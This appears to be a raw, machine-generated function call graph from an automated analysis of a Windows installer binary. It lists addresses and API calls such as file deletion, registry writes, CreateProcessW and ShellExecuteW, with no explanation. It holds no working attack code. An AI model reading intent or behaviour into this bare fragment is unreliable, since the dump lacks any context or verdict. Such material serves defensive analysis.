3150->3160 3171 40604b RegOpenKeyExW 3150->3171 3176 4060c5 wsprintfW 3150->3176 3177 40617e lstrcpynW 3150->3177 3151->3149 3154->3150 3156->3150 3157->3150 3158->3150 3159->3150 3160->3150 3161 40633a SHGetPathFromIDListW CoTaskMemFree 3160->3161 3161->3150 3168 40641f 3162->3168 3163 40649a CharPrevW 3164 406495 3163->3164 3164->3163 3166 4064bb 3164->3166 3165 406488 CharNextW 3165->3164 3165->3168 3166->3125 3168->3164 3168->3165 3169 406474 CharNextW 3168->3169 3170 406483 CharNextW 3168->3170 3179 405b5f 3168->3179 3169->3168 3170->3165 3172 4060bf 3171->3172 3173 40607f RegQueryValueExW 3171->3173 3172->3150 3174 4060a0 RegCloseKey 3173->3174 3174->3172 3176->3150 3177->3150 3178->3146 3180 405b65 3179->3180 3181 405b7b 3180->3181 3182 405b6c CharNextW 3180->3182 3181->3168 3182->3180 4017 4016c4 4018 402bbf 18 API calls 4017->4018 4019 4016ca GetFullPathNameW 4018->4019 4021 4016e4 4019->4021 4026 401706 4019->4026 4020 40171b GetShortPathNameW 4022 402a4c 4020->4022 4023 4064c1 2 API calls 4021->4023 4021->4026 4024 4016f6 4023->4024 4024->4026 4027 40617e lstrcpynW 4024->4027 4026->4020 4026->4022 4027->4026 4028 406846 4034 4066ca 4028->4034 4029 407035 4030 406754 GlobalAlloc 4030->4029 4030->4034 4031 40674b GlobalFree 4031->4030 4032 4067c2 GlobalFree 4033 4067cb GlobalAlloc 4032->4033 4033->4029 4033->4034 4034->4029 4034->4030 4034->4031 4034->4032 4034->4033 4038 40194e 4039 402bbf 18 API calls 4038->4039 4040 401955 lstrlenW 4039->4040 4041 402531 4040->4041 4042 4027ce 4043 4027d6 4042->4043 4044 4027da FindNextFileW 4043->4044 4046 4027ec 4043->4046 4045 402833 4044->4045 4044->4046 4048 40617e lstrcpynW 4045->4048 4048->4046 4056 405251 4057 405261 4056->4057 4058 405275 4056->4058 4059 405267 4057->4059 4068 4052be 4057->4068 4060 40527d IsWindowVisible 4058->4060 4066 405294 4058->4066 4061 40428e SendMessageW 4059->4061 4062 40528a 4060->4062 4060->4068 4064 405271 4061->4064 4069 404ba7 SendMessageW 4062->4069 4063 4052c3 CallWindowProcW 4063->4064 4066->4063 4074 404c27 4066->4074 4068->4063 4070 404c06 SendMessageW 4069->4070 4071 404bca GetMessagePos ScreenToClient SendMessageW 4069->4071 4073 404bfe 4070->4073 4072 404c03 4071->4072 4071->4073 4072->4070 4073->4066 4083 40617e lstrcpynW 4074->4083 4076 404c3a 4084 4060c5 wsprintfW 4076->4084 4078 404c44 4079 40140b 2 API calls 4078->4079 4080 404c4d 4079->4080 4085 40617e lstrcpynW 4080->4085 4082 404c54 4082->4068 4083->4076 4084->4078 4085->4082 4086 401754 4087 402bbf 18 API calls 4086->4087 4088 40175b 4087->4088 4089 405d82 2 API calls 4088->4089 4090 401762 4089->4090 4090->4090 3463 4038d5 3464 4038f0 3463->3464 3465 4038e6 CloseHandle 3463->3465 3466 403904 3464->3466 3467 4038fa CloseHandle 3464->3467 3465->3464 3472 403932 3466->3472 3467->3466 3473 403940 3472->3473 3474 403909 3473->3474 3475 403945 FreeLibrary GlobalFree 3473->3475 3476 40596f 3474->3476 3475->3474 3475->3475 3515 405c3a 3476->3515 3479 405997 DeleteFileW 3481 403915 3479->3481 3480 4059ae 3482 405ace 3480->3482 3529 40617e lstrcpynW 3480->3529 3482->3481 3489 4064c1 2 API calls 3482->3489 3484 4059d4 3485 4059e7 3484->3485 3486 4059da lstrcatW 3484->3486 3530 405b7e lstrlenW 3485->3530 3487 4059ed 3486->3487 3490 4059fd lstrcatW 3487->3490 3492 405a08 lstrlenW FindFirstFileW 3487->3492 3491 405af3 3489->3491 3490->3492 3491->3481 3493 405af7 3491->3493 3492->3482 3500 405a2a 3492->3500 3494 405b32 3 API calls 3493->3494 3495 405afd 3494->3495 3497 405927 5 API calls 3495->3497 3496 405ab1 FindNextFileW 3496->3500 3501 405ac7 FindClose 3496->3501 3499 405b09 3497->3499 3502 405b23 3499->3502 3503 405b0d 3499->3503 3500->3496 3506 405a72 3500->3506 3534 40617e lstrcpynW 3500->3534 3501->3482 3505 4052dd 25 API calls 3502->3505 3503->3481 3508 4052dd 25 API calls 3503->3508 3505->3481 3506->3496 3507 40596f 62 API calls 3506->3507 3511 4052dd 25 API calls 3506->3511 3513 4052dd 25 API calls 3506->3513 3535 405927 3506->3535 3543 40601f MoveFileExW 3506->3543 3507->3506 3509 405b1a 3508->3509 3510 40601f 38 API calls 3509->3510 3512 405b21 3510->3512 3511->3496 3512->3481 3513->3506 3547 40617e lstrcpynW 3515->3547 3517 405c4b 3548 405bdd CharNextW CharNextW 3517->3548 3520 40598f 3520->3479 3520->3480 3521 406412 5 API calls 3527 405c61 3521->3527 3522 405c92 lstrlenW 3523 405c9d 3522->3523 3522->3527 3524 405b32 3 API calls 3523->3524 3526 405ca2 GetFileAttributesW 3524->3526 3525 4064c1 2 API calls 3525->3527 3526->3520 3527->3520 3527->3522 3527->3525 3528 405b7e 2 API calls 3527->3528 3528->3522 3529->3484 3531 405b8c 3530->3531 3532 405b92 CharPrevW 3531->3532 3533 405b9e 3531->3533 3532->3531 3532->3533 3533->3487 3534->3500 3536 405d2e 2 API calls 3535->3536 3537 405933 3536->3537 3538 405954 3537->3538 3539 405942 RemoveDirectoryW 3537->3539 3540 40594a DeleteFileW 3537->3540 3538->3506 3541 405950 3539->3541 3540->3541 3541->3538 3542 405960 SetFileAttributesW 3541->3542 3542->3538 3544 406033 3543->3544 3546 406040 3543->3546 3554 405ead lstrcpyW 3544->3554 3546->3506 3547->3517 3549 405bfa 3548->3549 3553 405c0c 3548->3553 3551 405c07 CharNextW 3549->3551 3549->3553 3550 405c30 3550->3520 3550->3521 3551->3550 3552 405b5f CharNextW 3552->3553 3553->3550 3553->3552 3555 405ed5 3554->3555 3556 405efb GetShortPathNameW 3554->3556 3581 405d53 GetFileAttributesW CreateFileW 3555->3581 3558 405f10 3556->3558 3559 40601a 3556->3559 3558->3559 3561 405f18 wsprintfA 3558->3561 3559->3546 3560 405edf CloseHandle GetShortPathNameW 3560->3559 3562 405ef3 3560->3562 3563 4061a0 18 API calls 3561->3563 3562->3556 3562->3559 3564 405f40 3563->3564 3582 405d53 GetFileAttributesW CreateFileW 3564->3582 3566 405f4d 3566->3559 3567 405f5c GetFileSize GlobalAlloc 3566->3567 3568 406013 CloseHandle 3567->3568 3569 405f7e 3567->3569 3568->3559 3570 405dd6 ReadFile 3569->3570 3571 405f86 3570->3571 3571->3568 3583 405cb8 lstrlenA 3571->3583 3574 405fb1 3576 405cb8 4 API calls 3574->3576 3575 405f9d lstrcpyA 3577 405fbf 3575->3577 3576->3577 3578 405ff6 SetFilePointer 3577->3578 3579 405e05 WriteFile 3578->3579 3580 40600c GlobalFree 3579->3580 3580->3568 3581->3560 3582->3566 3584 405cf9 lstrlenA 3583->3584 3585 405d01 3584->3585 3586 405cd2 lstrcmpiA 3584->3586 3585->3574 3585->3575 3586->3585 3587 405cf0 CharNextA 3586->3587 3587->3584 4091 404356 lstrcpynW lstrlenW 4092 401d56 GetDC GetDeviceCaps 4093 402ba2 18 API calls 4092->4093 4094 401d74 MulDiv ReleaseDC 4093->4094 4095 402ba2 18 API calls 4094->4095 4096 401d93 4095->4096 4097 4061a0 18 API calls 4096->4097 4098 401dcc CreateFontIndirectW 4097->4098 4099 402531 4098->4099 4100 401a57 4101 402ba2 18 API calls 4100->4101 4102 401a5d 4101->4102 4103 402ba2 18 API calls 4102->4103 4104 401a05 4103->4104 4105 4014d7 4106 402ba2 18 API calls 4105->4106 4107 4014dd Sleep 4106->4107 4109 402a4c 4107->4109 4110 404c59 GetDlgItem GetDlgItem 4111 404cab 7 API calls 4110->4111 4118 404ec4 4110->4118 4112 404d41 SendMessageW 4111->4112 4113 404d4e DeleteObject 4111->4113 4112->4113 4114 404d57 4113->4114 4116 404d8e 4114->4116 4117 4061a0 18 API calls 4114->4117 4115 404fa8 4120 405054 4115->4120 4130 405001 SendMessageW 4115->4130 4150 404eb7 4115->4150 4119 404242 19 API calls 4116->4119 4121 404d70 SendMessageW SendMessageW 4117->4121 4118->4115 4128 404ba7 5 API calls 4118->4128 4153 404f35 4118->4153 4124 404da2 4119->4124 4122 405066 4120->4122 4123 40505e SendMessageW 4120->4123 4121->4114 4127 40508f 4122->4127 4132 405078 ImageList_Destroy 4122->4132 4133 40507f 4122->4133 4123->4122 4129 404242 19 API calls 4124->4129 4125 4042a9 8 API calls 4131 40524a 4125->4131 4126 404f9a SendMessageW 4126->4115 4135 4051fe 4127->4135 4149 404c27 4 API calls 4127->4149 4157 4050ca 4127->4157 4128->4153 4134 404db0 4129->4134 4136 405016 SendMessageW 4130->4136 4130->4150 4132->4133 4133->4127 4137 405088 GlobalFree 4133->4137 4138 404e85 GetWindowLongW SetWindowLongW 4134->4138 4145 404e7f 4134->4145 4148 404e00 SendMessageW 4134->4148 4151 404e3c SendMessageW 4134->4151 4152 404e4d SendMessageW 4134->4152 4140 405210 ShowWindow GetDlgItem ShowWindow 4135->4140 4135->4150 4139 405029 4136->4139 4137->4127 4141 404e9e 4138->4141 4144 40503a SendMessageW 4139->4144 4140->4150 4142 404ea4 ShowWindow 4141->4142 4143 404ebc 4141->4143 4161 404277 SendMessageW 4142->4161 4162 404277 SendMessageW 4143->4162 4144->4120 4145->4138 4145->4141 4148->4134 4149->4157 4150->4125 4151->4134 4152->4134 4153->4115 4153->4126 4154 4051d4 InvalidateRect 4154->4135 4155 4051ea 4154->4155 4163 404b62 4155->4163 4156 4050f8 SendMessageW 4160 40510e 4156->4160 4157->4156 4157->4160 4159 405182 SendMessageW SendMessageW 4159->4160 4160->4154 4160->4159 4161->4150 4162->4118 4166 404a99 4163->4166 4165 404b77 4165->4135 4167 404ab2 4166->4167 4168 4061a0 18 API calls 4167->4168 4169 404b16 4168->4169 4170 4061a0 18 API calls 4169->4170 4171 404b21 4170->4171 4172 4061a0 18 API calls 4171->4172 4173 404b37 lstrlenW wsprintfW SetDlgItemTextW 4172->4173 4173->4165 4174 40155b 4175 4029f2 4174->4175 4178 4060c5 wsprintfW 4175->4178 4177 4029f7 4178->4177 4179 401ddc 4180 402ba2 18 API calls 4179->4180 4181 401de2 4180->4181 4182 402ba2 18 API calls 4181->4182 4183 401deb 4182->4183 4184 401df2 ShowWindow 4183->4184 4185 401dfd EnableWindow 4183->4185 4186 402a4c 4184->4186 4185->4186 4187 4046dd 4188 404709 4187->4188 4189 40471a 4187->4189 4248 4058a7 GetDlgItemTextW 4188->4248 4191 404726 GetDlgItem 4189->4191 4197 404785 4189->4197 4192 40473a 4191->4192 4196 40474e SetWindowTextW 4192->4196 4200 405bdd 4 API calls 4192->4200 4193 404869 4246 404a18 4193->4246 4250 4058a7 GetDlgItemTextW 4193->4250 4194 404714 4195 406412 5 API calls 4194->4195 4195->4189 4201 404242 19 API calls 4196->4201 4197->4193 4202 4061a0 18 API calls 4197->4202 4197->4246 4199 4042a9 8 API calls 4204 404a2c 4199->4204 4205 404744 4200->4205 4206 40476a 4201->4206 4207 4047f9 SHBrowseForFolderW 4202->4207 4203 404899 4208 405c3a 18 API calls 4203->4208 4205->4196 4212 405b32 3 API calls 4205->4212 4209 404242 19 API calls 4206->4209 4207->4193 4210 404811 CoTaskMemFree 4207->4210 4211 40489f 4208->4211 4213 404778 4209->4213 4214 405b32 3 API calls 4210->4214 4251 40617e lstrcpynW 4211->4251 4212->4196 4249 404277 SendMessageW 4213->4249 4216 40481e 4214->4216 4219 404855 SetDlgItemTextW 4216->4219 4224 4061a0 18 API calls 4216->4224 4218 40477e 4221 406558 5 API calls 4218->4221 4219->4193 4220 4048b6 4222 406558 5 API calls 4220->4222 4221->4197 4223 4048bd 4222->4223 4226 4048fe 4223->4226 4234 405b7e 2 API calls 4223->4234 4235 404956 4223->4235 4225 40483d lstrcmpiW 4224->4225 4225->4219 4227 40484e lstrcatW 4225->4227 4252 40617e lstrcpynW 4226->4252 4227->4219 4229 404905 4230 405bdd 4 API calls 4229->4230 4231 40490b GetDiskFreeSpaceW 4230->4231 4233 40492f MulDiv 4231->4233 4231->4235 4233->4235 4234->4223 4236 4049c7 4235->4236 4238 404b62 21 API calls 4235->4238 4237 4049ea 4236->4237 4239 40140b 2 API calls 4236->4239 4253 404264 KiUserCallbackDispatcher 4237->4253 4240 4049b4 4238->4240 4239->4237 4242 4049c9 SetDlgItemTextW 4240->4242 4243 4049b9 4240->4243 4242->4236 4244 404a99 21 API calls 4243->4244 4244->4236 4245 404a06 4245->4246 4254 404672 4245->4254 4246->4199 4248->4194 4249->4218 4250->4203 4251->4220 4252->4229 4253->4245 4255 404680 4254->4255 4256 404685 SendMessageW 4254->4256 4255->4256 4256->4246 4257 4043df 4258 404511 4257->4258 4259 4043f7 4257->4259 4260 40457b 4258->4260 4262 40464d 4258->4262 4266 40454c GetDlgItem SendMessageW 4258->4266 4263 404242 19 API calls 4259->4263 4261 404585 GetDlgItem 4260->4261 4260->4262 4264 40460e 4261->4264 4265 40459f 4261->4265 4268 4042a9 8 API calls 4262->4268 4267 40445e 4263->4267 4264->4262 4270 404620 4264->4270 4265->4264 4269 4045c5 6 API calls 4265->4269 4288 404264 KiUserCallbackDispatcher 4266->4288 4272 404242 19 API calls 4267->4272 4273 404648 4268->4273 4269->4264 4274 404636 4270->4274 4275 404626 SendMessageW 4270->4275 4277 40446b CheckDlgButton 4272->4277 4274->4273 4278 40463c SendMessageW 4274->4278 4275->4274 4276 404576 4279 404672 SendMessageW 4276->4279 4286 404264 KiUserCallbackDispatcher 4277->4286 4278->4273 4279->4260 4281 404489 GetDlgItem 4287 404277 SendMessageW 4281->4287 4283 40449f SendMessageW 4284 4044c5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4283->4284 4285 4044bc GetSysColor 4283->4285 4284->4273 4285->4284 4286->4281 4287->4283 4288->4276 4289 401bdf 4290 402ba2 18 API calls 4289->4290 4291 401be6 4290->4291 4292 402ba2 18 API calls 4291->4292 4293 401bf0 4292->4293 4294 401c00 4293->4294 4295 402bbf 18 API calls 4293->4295 4296 401c10 4294->4296 4297 402bbf 18 API calls 4294->4297 4295->4294 4298 401c1b 4296->4298 4299 401c5f 4296->4299 4297->4296 4301 402ba2 18 API calls 4298->4301 4300 402bbf 18 API calls 4299->4300 4302 401c64 4300->4302 4303 401c20 4301->4303 4304 402bbf 18 API calls 4302->4304 4305 402ba2 18 API calls 4303->4305 4306 401c6d FindWindowExW 4304->4306 4307 401c29 4305->4307 4310 401c8f 4306->4310 4308 401c31 SendMessageTimeoutW 4307->4308 4309 401c4f SendMessageW 4307->4309 4308->4310 4309->4310 4311 4022df 4312 402bbf 18 API calls 4311->4312 4313 4022ee 4312->4313 4314 402bbf 18 API calls 4313->4314 4315 4022f7 4314->4315 4316 402bbf 18 API calls 4315->4316 4317 402301 GetPrivateProfileStringW 4316->4317 4318 401960 4319 402ba2 18 API calls 4318->4319 4320 401967 4319->4320 4321 402ba2 18 API calls 4320->4321 4322 401971 4321->4322 4323 402bbf 18 API calls 4322->4323 4324 40197a 4323->4324 4325 40198e lstrlenW 4324->4325 4326 4019ca 4324->4326 4327 401998 4325->4327 4327->4326 4331 40617e lstrcpynW 4327->4331 4329 4019b3 4329->4326 4330 4019c0 lstrlenW 4329->4330 4330->4326 4331->4329 4332 401662 4333 402bbf 18 API calls 4332->4333 4334 401668 4333->4334 4335 4064c1 2 API calls 4334->4335 4336 40166e 4335->4336 4337 4019e4 4338 402bbf 18 API calls 4337->4338 4339 4019eb 4338->4339 4340 402bbf 18 API calls 4339->4340 4341 4019f4 4340->4341 4342 4019fb lstrcmpiW 4341->4342 4343 401a0d lstrcmpW 4341->4343 4344 401a01 4342->4344 4343->4344 4345 4025e5 4346 402ba2 18 API calls 4345->4346 4348 4025f4 4346->4348 4347 40272d 4348->4347 4349 40263a ReadFile 4348->4349 4350 405dd6 ReadFile 4348->4350 4351 40267a MultiByteToWideChar 4348->4351 4352 40272f 4348->4352 4355 4026a0 SetFilePointer MultiByteToWideChar 4348->4355 4357 402740 4348->4357 4358 405e34 SetFilePointer 4348->4358 4349->4347 4349->4348 4350->4348 4351->4348 4367 4060c5 wsprintfW 4352->4367 4355->4348 4356 402761 SetFilePointer 4356->4347 4357->4347 4357->4356 4359 405e50 4358->4359 4364 405e6c 4358->4364 4360 405dd6 ReadFile 4359->4360 4361 405e5c 4360->4361 4362 405e75 SetFilePointer 4361->4362 4363 405e9d SetFilePointer 4361->4363 4361->4364 4362->4363 4365 405e80 4362->4365 4363->4364 4364->4348 4366 405e05 WriteFile 4365->4366 4366->4364 4367->4347 3183 401e66 3184 402bbf 18 API calls 3183->3184 3185 401e6c 3184->3185 3186 4052dd 25 API calls 3185->3186 3187 401e76 3186->3187 3201 40585e CreateProcessW 3187->3201 3190 40281e 3191 401edb CloseHandle 3191->3190 3192 401e8c WaitForSingleObject 3194 401e9e 3192->3194 3193 401eb0 GetExitCodeProcess 3195 401ec2 3193->3195 3196 401ecf 3193->3196 3194->3193 3204 406594 3194->3204 3208 4060c5 wsprintfW 3195->3208 3196->3191 3199 401ecd 3196->3199 3199->3191 3202 405891 CloseHandle 3201->3202 3203 401e7c 3201->3203 3202->3203 3203->3190 3203->3191 3203->3192 3205 4065b1 PeekMessageW 3204->3205 3206 401ea5 WaitForSingleObject 3205->3206 3207 4065a7 DispatchMessageW 3205->3207 3206->3194 3207->3205 3208->3199 3209 401767 3210 402bbf 18 API calls 3209->3210 3211 40176e 3210->3211 3212 401796 3211->3212 3213 40178e 3211->3213 3267 40617e lstrcpynW 3212->3267 3266 40617e lstrcpynW 3213->3266 3216 4017a1 3268 405b32 lstrlenW CharPrevW 3216->3268 3217 401794 3220 406412 5 API calls 3217->3220 3230 4017b3 3220->3230 3224 4017c5 CompareFileTime 3224->3230 3225 401885 3226 4052dd 25 API calls 3225->3226 3228 40188f 3226->3228 3227 4052dd 25 API calls 3229 401871 3227->3229 3251 4030e7 3228->3251 3230->3224 3230->3225 3232 40617e lstrcpynW 3230->3232 3235 4061a0 18 API calls 3230->3235 3246 40185c 3230->3246 3247 405d2e GetFileAttributesW 3230->3247 3250 405d53 GetFileAttributesW CreateFileW 3230->3250 3271 4064c1 FindFirstFileW 3230->3271 3274 4058c3 3230->3274 3232->3230 3234 4018b6 SetFileTime 3236 4018c8 CloseHandle 3234->3236 3235->3230 3236->3229 3237 4018d9 3236->3237 3238 4018f1 3237->3238 3239 4018de 3237->3239 3241 4061a0 18 API calls 3238->3241 3240 4061a0 18 API calls 3239->3240 3242 4018e6 lstrcatW 3240->3242 3243 4018f9 3241->3243 3242->3243 3245 4058c3 MessageBoxIndirectW 3243->3245 3245->3229 3246->3227 3246->3229 3248 405d40 SetFileAttributesW 3247->3248 3249 405d4d 3247->3249 3248->3249 3249->3230 3250->3230 3252 403112 3251->3252 3253 4030f6 SetFilePointer 3251->3253 3278 4031ef GetTickCount 3252->3278 3253->3252 3258 4031ef 43 API calls 3259 403149 3258->3259 3260 4031b5 ReadFile 3259->3260 3263 403158 3259->3263 3265 4018a2 3259->3265 3260->3265 3262 405dd6 ReadFile 3262->3263 3263->3262 3263->3265 3293 405e05 WriteFile 3263->3293 3265->3234 3265->3236 3266->3217 3267->3216 3269 4017a7 lstrcatW 3268->3269 3270 405b4e lstrcatW 3268->3270 3269->3217 3270->3269 3272 4064e2 3271->3272 3273 4064d7 FindClose 3271->3273 3272->3230 3273->3272 3275 4058d8 3274->3275 3276 405924 3275->3276 3277 4058ec MessageBoxIndirectW 3275->3277 3276->3230 3277->3276 3279 403347 3278->3279 3280 40321d 3278->3280 3281 402d9f 33 API calls 3279->3281 3295 40336e SetFilePointer 3280->3295 3287 403119 3281->3287 3283 403228 SetFilePointer 3289 40324d 3283->3289 3287->3265 3291 405dd6 ReadFile 3287->3291 3288 405e05 WriteFile 3288->3289 3289->3287 3289->3288 3290 403328 SetFilePointer 3289->3290 3296 403358 3289->3296 3299 406697 3289->3299 3306 402d9f 3289->3306 3290->3279 3292 403132 3291->3292 3292->3258 3292->3265 3294 405e23 3293->3294 3294->3263 3295->3283 3297 405dd6 ReadFile 3296->3297 3298 40336b 3297->3298 3298->3289 3300 4066bc 3299->3300 3305 4066c4 3299->3305 3300->3289 3301 406754 GlobalAlloc 3301->3300 3301->3305 3302 40674b GlobalFree 3302->3301 3303 4067c2 GlobalFree 3304 4067cb GlobalAlloc 3303->3304 3304->3300 3304->3305 3305->3300 3305->3301 3305->3302 3305->3303 3305->3304 3307 402db0 3306->3307 3308 402dc8 3306->3308 3311 402db9 DestroyWindow 3307->3311 3314 402dc0 3307->3314 3309 402dd0 3308->3309 3310 402dd8 GetTickCount 3308->3310 3312 406594 2 API calls 3309->3312 3313 402de6 3310->3313 3310->3314 3311->3314 3312->3314 3315 402e1b CreateDialogParamW ShowWindow 3313->3315 3316 402dee 3313->3316 3314->3289 3315->3314 3316->3314 3321 402d83 3316->3321 3318 402dfc wsprintfW 3319 4052dd 25 API calls 3318->3319 3320 402e19 3319->3320 3320->3314 3322 402d92 3321->3322 3323 402d94 MulDiv 3321->3323 3322->3323 3323->3318 4375 401ee9 4376 402bbf 18 API calls 4375->4376 4377 401ef0 4376->4377 4378 4064c1 2 API calls 4377->4378 4379 401ef6 4378->4379 4381 401f07 4379->4381 4382 4060c5 wsprintfW 4379->4382 4382->4381 3324 403d6a 3325 403d82 3324->3325 3326 403ebd 3324->3326 3325->3326 3327 403d8e 3325->3327 3328 403f0e 3326->3328 3329 403ece GetDlgItem GetDlgItem 3326->3329 3330 403d99 SetWindowPos 3327->3330 3331 403dac 3327->3331 3333 403f68 3328->3333 3341 401389 2 API calls 3328->3341 3332 404242 19 API calls 3329->3332 3330->3331 3335 403db1 ShowWindow 3331->3335 3336 403dc9 3331->3336 3337 403ef8 SetClassLongW 3332->3337 3353 403eb8 3333->3353 3394 40428e 3333->3394 3335->3336 3338 403dd1 DestroyWindow 3336->3338 3339 403deb 3336->3339 3340 40140b 2 API calls 3337->3340 3393 4041cb 3338->3393 3342 403df0 SetWindowLongW 3339->3342 3343 403e01 3339->3343 3340->3328 3344 403f40 3341->3344 3342->3353 3347 403eaa 3343->3347 3348 403e0d GetDlgItem 3343->3348 3344->3333 3349 403f44 SendMessageW 3344->3349 3345 40140b 2 API calls 3383 403f7a 3345->3383 3346 4041cd DestroyWindow KiUserCallbackDispatcher 3346->3393 3413 4042a9 3347->3413 3352 403e20 SendMessageW IsWindowEnabled 3348->3352 3355 403e3d 3348->3355 3349->3353 3351 4041fc ShowWindow 3351->3353 3352->3353 3352->3355 3354 4061a0 18 API calls 3354->3383 3356 403e4a 3355->3356 3357 403e91 SendMessageW 3355->3357 3358 403e5d 3355->3358 3366 403e42 3355->3366 3356->3357 3356->3366 3357->3347 3360 403e65 3358->3360 3361 403e7a 3358->3361 3407 40140b 3360->3407 3364 40140b 2 API calls 3361->3364 3362 403e78 3362->3347 3367 403e81 3364->3367 3365 404242 19 API calls 3365->3383 3410 40421b 3366->3410 3367->3347 3367->3366 3369 403ff5 GetDlgItem 3370 404012 ShowWindow KiUserCallbackDispatcher 3369->3370 3371 40400a 3369->3371 3400 404264 KiUserCallbackDispatcher 3370->3400 3371->3370 3373 40403c EnableWindow 3376 404050 3373->3376 3374 404055 GetSystemMenu EnableMenuItem SendMessageW 3375 404085 SendMessageW 3374->3375 3374->3376 3375->3376 3376->3374 3401 404277 SendMessageW 3376->3401 3402 40617e lstrcpynW 3376->3402 3379 4040b3 lstrlenW 3380 4061a0 18 API calls 3379->3380 3381 4040c9 SetWindowTextW 3380->3381 3403 401389 3381->3403 3383->3345 3383->3346 3383->3353 3383->3354 3383->3365 3384 40410d DestroyWindow 3383->3384 3397 404242 3383->3397 3385 404127 CreateDialogParamW 3384->3385 3384->3393 3386 40415a 3385->3386 3385->3393 3387 404242 19 API calls 3386->3387 3388 404165 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3387->3388 3389 401389 2 API calls 3388->3389 3390 4041ab 3389->3390 3390->3353 3391 4041b3 ShowWindow 3390->3391 3392 40428e SendMessageW 3391->3392 3392->3393 3393->3351 3393->3353 3395 4042a6 3394->3395 3396 404297 SendMessageW 3394->3396 3395->3383 3396->3395 3398 4061a0 18 API calls 3397->3398 3399 40424d SetDlgItemTextW 3398->3399 3399->3369 3400->3373 3401->3376 3402->3379 3405 401390 3403->3405 3404 4013fe 3404->3383 3405->3404 3406 4013cb MulDiv SendMessageW 3405->3406 3406->3405 3408 401389 2 API calls 3407->3408 3409 401420 3408->3409 3409->3366 3411 404222 3410->3411 3412 404228 SendMessageW 3410->3412 3411->3412 3412->3362 3414 4042c1 GetWindowLongW 3413->3414 3424 40434a 3413->3424 3415 4042d2 3414->3415 3414->3424 3416 4042e1 GetSysColor 3415->3416 3417 4042e4 3415->3417 3416->3417 3418 4042f4 SetBkMode 3417->3418 3419 4042ea SetTextColor 3417->3419 3420 404312 3418->3420 3421 40430c GetSysColor 3418->3421 3419->3418 3422 404319 SetBkColor 3420->3422 3423 404323 3420->3423 3421->3420 3422->3423 3423->3424 3425 404336 DeleteObject 3423->3425 3426 40433d CreateBrushIndirect 3423->3426 3424->3353 3425->3426 3426->3424 3427 4021ea 3428 402bbf 18 API calls 3427->3428 3429 4021f0 3428->3429 3430 402bbf 18 API calls 3429->3430 3431 4021f9 3430->3431 3432 402bbf 18 API calls 3431->3432 3433 402202 3432->3433 3434 4064c1 2 API calls 3433->3434 3435 40220b 3434->3435 3436 40221c lstrlenW lstrlenW 3435->3436 3437 40220f 3435->3437 3439 4052dd 25 API calls 3436->3439 3438 4052dd 25 API calls 3437->3438 3441 402217 3437->3441 3438->3441 3440 40225a SHFileOperationW 3439->3440 3440->3437 3440->3441 3458 40156b 3459 401584 3458->3459 3460 40157b ShowWindow 3458->3460 3461 401592 ShowWindow 3459->3461 3462 402a4c 3459->3462 3460->3459 3461->3462 4383 40226e 4384 402275 4383->4384 4388 402288 4383->4388 4385 4061a0 18 API calls 4384->4385 4386 402282 4385->4386 4387 4058c3 MessageBoxIndirectW 4386->4387 4387->4388 4389 4014f1 SetForegroundWindow 4390 402a4c 4389->4390 4391 401673 4392 402bbf 18 API calls 4391->4392 4393 40167a 4392->4393 4394 402bbf 18 API calls 4393->4394 4395 401683 4394->4395 4396 402bbf 18 API calls 4395->4396 4397 40168c MoveFileW 4396->4397 4398 40169f 4397->4398 4404 401698 4397->4404 4399 4064c1 2 API calls 4398->4399 4400 4021e1 4398->4400 4402 4016ae 4399->4402 4401 401423 25 API calls 4401->4400 4402->4400 4403 40601f 38 API calls 4402->4403 4403->4404 4404->4401 4405 401cfa GetDlgItem GetClientRect 4406 402bbf 18 API calls 4405->4406 4407 401d2c LoadImageW SendMessageW 4406->4407 4408 401d4a DeleteObject 4407->4408 4409 402a4c 4407->4409 4408->4409 3870 40237b 3871 402381 3870->3871 3872 402bbf 18 API calls 3871->3872 3873 402393 3872->3873 3874 402bbf 18 API calls 3873->3874 3875 40239d RegCreateKeyExW 3874->3875 3876 4023c7 3875->3876 3880 402a4c 3875->3880 3877 4023e2 3876->3877 3878 402bbf 18 API calls 3876->3878 3879 4023ee 3877->3879 3887 402ba2 3877->3887 3881 4023d8 lstrlenW 3878->3881 3883 402409 RegSetValueExW 3879->3883 3884 4030e7 45 API calls 3879->3884 3881->3877 3885 40241f RegCloseKey 3883->3885 3884->3883 3885->3880 3888 4061a0 18 API calls 3887->3888 3889 402bb6 3888->3889 3889->3879 4417 4027fb 4418 402bbf 18 API calls 4417->4418 4419 402802 FindFirstFileW 4418->4419 4420 40282a 4419->4420 4423 402815 4419->4423 4421 402833 4420->4421 4425 4060c5 wsprintfW 4420->4425 4426 40617e lstrcpynW 4421->4426 4425->4421 4426->4423 4434 4014ff 4435 401507 4434->4435 4437 40151a 4434->4437 4436 402ba2 18 API calls 4435->4436 4436->4437 4438 401000 4439 401037 BeginPaint GetClientRect 4438->4439 4440 40100c DefWindowProcW 4438->4440 4442 4010f3 4439->4442 4445 401179 4440->4445 4443 401073 CreateBrushIndirect FillRect DeleteObject 4442->4443 4444 4010fc 4442->4444 4443->4442 4446 401102 CreateFontIndirectW 4444->4446 4447 401167 EndPaint 4444->4447 4446->4447 4448 401112 6 API calls 4446->4448 4447->4445 4448->4447 4456 401904 4457 40193b 4456->4457 4458 402bbf 18 API calls 4457->4458 4459 401940 4458->4459 4460 40596f 69 API calls 4459->4460 4461 401949 4460->4461 4462 402d04 4463 402d16 SetTimer 4462->4463 4464 402d2f 4462->4464 4463->4464 4465 402d7d 4464->4465 4466 402d83 MulDiv 4464->4466 4467 402d3d wsprintfW SetWindowTextW SetDlgItemTextW 4466->4467 4467->4465 4469 403985 4470 403990 4469->4470 4471 403994 4470->4471 4472 403997 GlobalAlloc 4470->4472 4472->4471 4473 402786 4474 40278d 4473->4474 4477 4029f7 4473->4477 4475 402ba2 18 API calls 4474->4475 4476 402798 4475->4476 4478 40279f SetFilePointer 4476->4478 4478->4477 4479 4027af 4478->4479 4481 4060c5 wsprintfW 4479->4481 4481->4477 4482 401907 4483 402bbf 18 API calls 4482->4483 4484 40190e 4483->4484 4485 4058c3 MessageBoxIndirectW 4484->4485 4486 401917 4485->4486 4487 401e08 4488 402bbf 18 API calls 4487->4488 4489 401e0e 4488->4489 4490 402bbf 18 API calls 4489->4490 4491 401e17 4490->4491 4492 402bbf 18 API calls 4491->4492 4493 401e20 4492->4493 4494 402bbf 18 API calls 4493->4494 4495 401e29 4494->4495 4496 401423 25 API calls 4495->4496 4497 401e30 ShellExecuteW 4496->4497 4498 401e61 4497->4498 4504 404390 